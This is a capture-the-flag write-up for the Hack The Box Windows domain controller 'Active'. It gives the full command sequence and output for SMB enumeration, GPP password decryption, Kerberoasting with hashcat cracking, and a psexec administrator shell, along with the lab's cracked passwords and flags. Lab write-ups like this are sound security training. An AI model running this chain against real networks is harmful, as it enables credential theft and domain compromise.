Table of contents

Info

CTF URL: https://app.hackthebox.com/machines/148

IP: 10.10.10.100

Difficulty: Easy

Reconaisance

NMAP

nmap -p- -sS -sC -sV 10.10.10.100 -v --min-rate 10000

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-31 08:08:06Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-31T08:09:01
|_  start_date: 2024-07-29T09:53:28
|_clock-skew: -1m02s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

Users/Groups/Domain Enum

Get Domain Name

crackmapexec smb 10.10.10.100                                    
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)

• active.htb

Kerbrute

git clone https://github.com/ropnop/kerbrute.git
cd kerbrute
go build

wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/xato-net-10-million-usernames.txt

./kerbrute userenum xato-net-10-million-usernames.txt --dc 10.10.10.100 -d active.htb

kerbrute2userlist.sh:

#!/bin/bash
LOG_FILE=$1

USERNAMES_WITH_DOMAIN="$1[email protected]"
USERNAMES_WITHOUT_DOMAIN="$1.users.txt"

awk -F': +' '{print $2}' "$LOG_FILE" | tr '[:upper:]' '[:lower:]' | sort -u > "$USERNAMES_WITH_DOMAIN"
awk -F'@' '{print $1}' "$USERNAMES_WITH_DOMAIN" | sort -u > "$USERNAMES_WITHOUT_DOMAIN"

echo "Usernames with domain saved to $USERNAMES_WITH_DOMAIN"
echo "Usernames without domain saved to $USERNAMES_WITHOUT_DOMAIN"

enum4linux

enum4linux 10.10.10.100

 =================================( Share Enumeration on 10.10.10.100 )=================================
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)                                                                                                                                                     

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.100

//10.10.10.100/ADMIN$   Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/C$       Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/IPC$     Mapping: OK Listing: DENIED Writing: N/A
//10.10.10.100/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Replication      Mapping: OK Listing: OK Writing: N/A
//10.10.10.100/SYSVOL   Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Users    Mapping: DENIED Listing: N/A Writing: N/A

• //10.10.10.100/Replication - the interesting one

Connecting to share

smbclient //10.10.10.100/Replication -N
Recurse on
prompt off
mget *
# there is such file
...

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018
...
# get it
get Groups.xml

Foothold as SVC_TGS

Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Useful information

active.htb\SVC_TGS
edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

let’s decrypt

gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
# result
GPPstillStandingStrong2k18

• active.htb\SVC_TGS:GPPstillStandingStrong2k18

Use Credentials

# let's check credentials
crackmapexec smb 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
# shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.100    445    DC               C$                              Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.10.100    445    DC               Replication     READ            
SMB         10.10.10.100    445    DC               SYSVOL          READ            Logon server share 
SMB         10.10.10.100    445    DC               Users           READ            

smbclient //10.10.10.100/Users -U 'SVC_TGS%GPPstillStandingStrong2k18'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018
smb: \SVC_TGS\Desktop\> get user.txt


cat user.txt 
a073f1af8a2d80a283bd2bf27d11708c

Kerberoast

Get SPN User and his password

wget https://raw.githubusercontent.com/fortra/impacket/master/examples/GetUserSPNs.py
python3 GetUserSPNs.py -dc-ip 10.10.10.100 active.htb/SVC_TGS -request

# $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$e0e3007e948fbe2d199baa153b309a6c$9d7b39c1e239958945a16eec3d207c02302e9901d2f6931b00f442bb736ba7065517fe2710aaa085d23a21e77ff85a1111c39889d26998ec8931b38893b9e09e75f3e9bf74d99d8a5e758f2db0c469a150051958af626e83e48596e12282443745f1cefd56250c122e023805a45e7abcabecf2db0c0d4fa0812b5b113c669dfb7a46431e947d753a96ff0bdcc1d8239ac4d5cdfb296653e724f443b9a0cece33e53991a1e3a31886b2950409d53aacd09fca86e81f35b85722c87eb1363f55a9df07069965a1760ecf8fe4979749bfde97c8f2f78e05309604b5aa4d0b94ce696fff14a54ce60c546d73e70abe316c76b18731d36ab4224c3a931621d8edda25e1017b90713c4e0397466bfd8adb690683cfb12dc170baf3ee37b160ecd6a2ec3315fcc1a04397239bac3ea715faeb53ea217eed2a4c9cb8f43ef07cef2289c3a796455034eb46fe0056024875f9f48f7cd845a365dbff1a9db558fe3d9d99b01bd3134330cfd0c018fbb36cbbe84b857732f9d5e937bcc22ef3f2a0a659f13c7f581c58d20c53e97e5eb6a0e20ff60d6ebc91e2da9a5736d40a12020bb15e4282e639f2c1b5f6041128643345d63215267a79ea0321792c2b9b412951f0a29e34097a95c51e600f062c16d7f274901e78addd1cbd1f5cd1ba45d90f048ebf07d3cea66307d972289b812007a84f23203936212bb4941add7f07bc5fe788855cd02f7e4acec9f9fe3557babf1825fe6fb0566fa6aa9c1441e433c2e134b3391252588d4c28b1f7533284d6e51d4a51bd1611a0e7756cb835c0c2ec8d4854df1a5e534a5fda4f824328a3be035e4d289d4f022186b573f001614dc41ac111e91033eac7482e1044b6c6a0d0ec66b06fe877a27cfb710fbd70ca4f8e3f357f9ae9c9f2291f7ea50b55a5b9dc8ce97b59806040321a58f536ab710c7315675557a7eb011fb36da936c8777da116f7ec88aea7749406ecaa9156aacc5d885868a6e0ac0afd63023295faef81fc266a186be3a32a4adfc1a8b5b1ca2d99a3f7ee94e303363fe0488f462a51331d0a5a9db423a722b59393aebe2e30bdf9cba996d096e84826ffb41f80e460f5f2cce136d5e8bab71d7a9c89ec8c0cf1c4d78ec07cdff655d1ebf016ba72947b373a070f1cd9dc2ac0ef3b78f9abfa9afe773f5b25a6c257fcfbb12ee4555c85fadbea3f7ffa8ac2f3b02b57fe1d8f40a5fd088f2bc45c329baf21e6b483ebfc3a7e66e506f7a339abf73dd417d630fe

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
# found!
Ticketmaster1968

Login as Administrator

# get a shell
impacket-psexec 'administrator:[email protected]'
# then

C:\Users\Administrator\Desktop> type root.txt
4e2687c66d48d5f96374b13f9234dc3d

Result

https://www.hackthebox.com/achievement/machine/1349385/148